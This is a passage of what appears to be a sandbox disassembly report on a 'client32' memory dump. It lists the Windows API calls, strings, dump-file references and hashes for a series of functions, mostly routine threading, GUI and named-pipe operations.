                                                                                          • Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,B24479DC,00000000,00000000,00000000,110CF110,?,00000001), ref: 110CEE2A
                                                                                          • Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEE92
                                                                                        • IsWindow.USER32(?), ref: 110CF82B
                                                                                          • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                        • RemovePropA.USER32(?), ref: 110CF858
                                                                                        • DeleteObject.GDI32(?), ref: 110CF86C
                                                                                        • DeleteObject.GDI32(?), ref: 110CF876
                                                                                        • DeleteObject.GDI32(?), ref: 110CF880
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1921910413-0
                                                                                        • Opcode ID: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                        • Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
                                                                                        • Opcode Fuzzy Hash: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                                        • Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2
                                                                                        APIs
                                                                                        Strings
                                                                                        • ..\CTL32\DataStream.cpp, xrefs: 1108165E
                                                                                        • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
                                                                                        • %02x, xrefs: 11081610
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wsprintf
                                                                                        • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                        • API String ID: 2111968516-476189988
                                                                                        • Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                        • Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
                                                                                        • Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                                        • Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
                                                                                        APIs
                                                                                          • Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6
                                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                                        • SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                                        • DeleteObject.GDI32(?), ref: 1111F4E4
                                                                                        • DeleteObject.GDI32(?), ref: 1111F4F1
                                                                                        • DeleteObject.GDI32(?), ref: 1111F516
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DeleteObject$PaletteSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2820294704-0
                                                                                        • Opcode ID: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                        • Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
                                                                                        • Opcode Fuzzy Hash: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                                        • Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$DispatchItemTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 1381171329-0
                                                                                        • Opcode ID: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
                                                                                        • Instruction ID: 1d3eb3fe4f0069694488dcbc6a13b2e6f5653f41aef2ba1524fd952247bef68a
                                                                                        • Opcode Fuzzy Hash: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
                                                                                        • Instruction Fuzzy Hash: 9721D171E0030B5BE714DAA1CC85BEFB7E8AF44308F404029EA2797580FA75E401CB94
                                                                                        APIs
                                                                                          • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                          • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                          • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                          • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                                        • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                                        • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                                        • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                                        • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                                        Strings
                                                                                        • Global\Client32Provider, xrefs: 1104F1BB
                                                                                        • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                                        • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                                        • API String ID: 3682529815-1899068400
                                                                                        • Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                        • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                                        • Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                                        • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                                        APIs
                                                                                        • _malloc.LIBCMT ref: 11163972
                                                                                          • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                          • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                          • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                        • _free.LIBCMT ref: 11163985
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                        • String ID:
                                                                                        • API String ID: 1020059152-0
                                                                                        • Opcode ID: 77676965e9e40f6af87a66b0b8311ab755c02a438921afc9ee71fd3014ec5639
                                                                                        • Instruction ID: 99a0502aaeb7ade96a4deef53194f79690bd7c081ca6f8299ad08a7ab0eaa67e
                                                                                        • Opcode Fuzzy Hash: 77676965e9e40f6af87a66b0b8311ab755c02a438921afc9ee71fd3014ec5639
                                                                                        • Instruction Fuzzy Hash: 6D110837618637AADB121B74A808649FB9CAF843F8B214126E85D96140FEB2D460CF90
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B395F
                                                                                        • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B397E
                                                                                        • GetSystemMetrics.USER32(0000004C,?,?,?,00000000,?,1104362F,?,?,?), ref: 110B39A7
                                                                                        • GetSystemMetrics.USER32(0000004D,?,?,00000000,?,1104362F,?,?,?), ref: 110B39AD
                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,1104362F,?,?,?), ref: 110B39DB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$LeaveMetricsSystem$Enter
                                                                                        • String ID:
                                                                                        • API String ID: 4125181052-0
                                                                                        • Opcode ID: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                                        • Instruction ID: 2eabc0a5c64141517199ab689f696fc8c069b56ecca888d5095ec5d0d1156609
                                                                                        • Opcode Fuzzy Hash: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                                        • Instruction Fuzzy Hash: 6F11B132600608DFD314CF79C9849AAFBE5FFD8314B20866ED51A87614EB72E806CB80
                                                                                        APIs
                                                                                        • GetMessageA.USER32 ref: 11091B1A
                                                                                          • Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75097BD3,00000000,75097809,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
                                                                                          • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD988
                                                                                          • Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD99A
                                                                                          • Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4
                                                                                        • TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
                                                                                        • TranslateMessage.USER32(?), ref: 11091B51
                                                                                        • DispatchMessageA.USER32(?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B5B
                                                                                        • GetMessageA.USER32 ref: 11091B6B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$CriticalSectionSendTranslate$AcceleratorDispatchEnterLeave
                                                                                        • String ID:
                                                                                        • API String ID: 754905447-0
                                                                                        • Opcode ID: 36596b3fcd7649346ff41791d0d657cf133c8c9ccfa1a3f74e0687a191674282
                                                                                        • Instruction ID: 5368b2b879de48b6c9ab70957daae04249f1b13f85d80b649f1e25af9e3021ba
                                                                                        • Opcode Fuzzy Hash: 36596b3fcd7649346ff41791d0d657cf133c8c9ccfa1a3f74e0687a191674282
                                                                                        • Instruction Fuzzy Hash: D901B172F4030FABE714DBA58C91FABB3ADEB84718F004568F628D6080F674E40587A4
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(pJN,00000000,?,?,1100C26B,00000000,00000000), ref: 1100D8BF
                                                                                        • LeaveCriticalSection.KERNEL32(pJN,?,?,1100C26B,00000000,00000000), ref: 1100D930
                                                                                          • Part of subcall function 1100D820: EnterCriticalSection.KERNEL32(pJN,1100CB7A,?,1100B5DC,?,00000000,?,1100CB7A,?), ref: 1100D829
                                                                                          • Part of subcall function 1100D820: LeaveCriticalSection.KERNEL32(pJN,1100B5DC,?,00000000,?,1100CB7A,?), ref: 1100D8A1
                                                                                        • LeaveCriticalSection.KERNEL32(pJN), ref: 1100D8FF
                                                                                        • LeaveCriticalSection.KERNEL32(pJN), ref: 1100D91B
                                                                                          • Part of subcall function 1100D7D0: EnterCriticalSection.KERNEL32(pJN,1100C4FB), ref: 1100D7D5
                                                                                          • Part of subcall function 1100D7D0: LeaveCriticalSection.KERNEL32(pJN), ref: 1100D80F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Leave$Enter
                                                                                        • String ID: pJN
                                                                                        • API String ID: 2978645861-809663066
                                                                                        • Opcode ID: 10c14cb9c45534fd9ad9362a8b8fd8fef3d09697d59f75ad4657c47dcd1b45a9
                                                                                        • Instruction ID: 024bf54fe56583fc36b1911af5d7f6a9c338d46169c8d4f8be6289797e831c79
                                                                                        • Opcode Fuzzy Hash: 10c14cb9c45534fd9ad9362a8b8fd8fef3d09697d59f75ad4657c47dcd1b45a9
                                                                                        • Instruction Fuzzy Hash: 52018835E0113C6BEB00DBE9ED4D5ADB7A9EB04B9AB4001A6FD18D3A04E631AD0087E1
                                                                                        APIs
                                                                                        • EnterCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B38DB
                                                                                        • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B38FE
                                                                                        • SetEvent.KERNEL32(?,?,?,?,1104697C,?,00000001), ref: 110B391A
                                                                                        • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B3921
                                                                                        • LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B3937
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$Leave$EnterEvent
                                                                                        • String ID:
                                                                                        • API String ID: 3394196147-0
                                                                                        • Opcode ID: fdee94f62a1441ef2fb2e0d13d0020e1b07e13719dfc0f2ec25fda12d642710e
                                                                                        • Instruction ID: 98664a83d6f2f53ed4065ca3297c8b6ddfbfa19bf6bfb34fa0046f3acd8e92ae
                                                                                        • Opcode Fuzzy Hash: fdee94f62a1441ef2fb2e0d13d0020e1b07e13719dfc0f2ec25fda12d642710e
                                                                                        • Instruction Fuzzy Hash: 9101DB321402149FD32596D9D444BD7FBE8FF69725F00442BF5AAC6900D7B5E046CB51
                                                                                        APIs
                                                                                        • SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000,?,?,?,110F5EF9), ref: 110F3895
                                                                                        • ConnectNamedPipe.KERNEL32(00000000,00000000,?,?,110F5EF9), ref: 110F38AA
                                                                                        • GetLastError.KERNEL32(?,?,110F5EF9), ref: 110F38B0
